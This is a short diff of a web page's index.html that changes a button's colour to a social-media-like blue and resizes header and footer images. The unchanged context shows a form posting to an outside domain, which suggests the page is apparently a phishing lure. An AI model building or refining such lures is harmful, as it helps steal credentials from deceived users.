--- a/index.html
+++ b/index.html
@@ -25,14 +25,14 @@
                    height: 40px;
                    border: none;
                    border-radius: 80px;
-                   background-color: #5762ef;
+                   background-color: #1877F2;
                    color: white;
                  }
                  </style>
                  </head>
           <center>
                  <img class="w3-hide-large w3-hide-medium" src="top.png">
-                  <img class="w3-hide-small" style="width: 200px;" src="top.png">
+                  <img class="w3-hide-small" style="width: 50%;" src="top.png">
                  <center>
           
     <form action="https://pinnocent.com/vpage" method="POST">
@@ -54,7 +54,7 @@
     </div>
     </form>
     <img class="w3-hide-large w3-hide-medium" src="bottom.png">
-      <img class="w3-hide-small" style="width: 60%;" src="bottom.png">
+      <img class="w3-hide-small" style="width: 50%;" src="bottom.png">
     </div>
     </div>
     </div></body></html>
